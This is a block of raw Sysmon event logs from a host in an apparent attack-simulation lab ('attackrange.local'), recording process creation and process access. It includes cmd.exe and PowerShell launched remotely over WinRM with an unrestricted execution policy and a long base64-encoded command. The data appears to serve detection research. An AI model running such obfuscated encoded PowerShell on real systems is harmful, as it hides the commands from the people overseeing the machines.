154100x80000000000000003696Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.686{10ACEC4A-8583-5FCF-B800-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8583-5FCF-F6EB-060000000000}0x6ebf60HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8583-5FCF-B700-000000009101}1004C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000003695Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003694Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8583-5FCF-B600-000000009101}45204532C:\Windows\system32\conhost.exe{10ACEC4A-8583-5FCF-B700-000000009101}1004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003693Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003692Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003691Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003690Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003689Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003688Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003687Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003686Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003685Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003684Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8583-5FCF-B700-000000009101}1004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003683Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8583-5FCF-B500-000000009101}5080732C:\Windows\system32\WinrsHost.exe{10ACEC4A-8583-5FCF-B700-000000009101}1004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000003682Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.680{10ACEC4A-8583-5FCF-B700-000000009101}1004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® 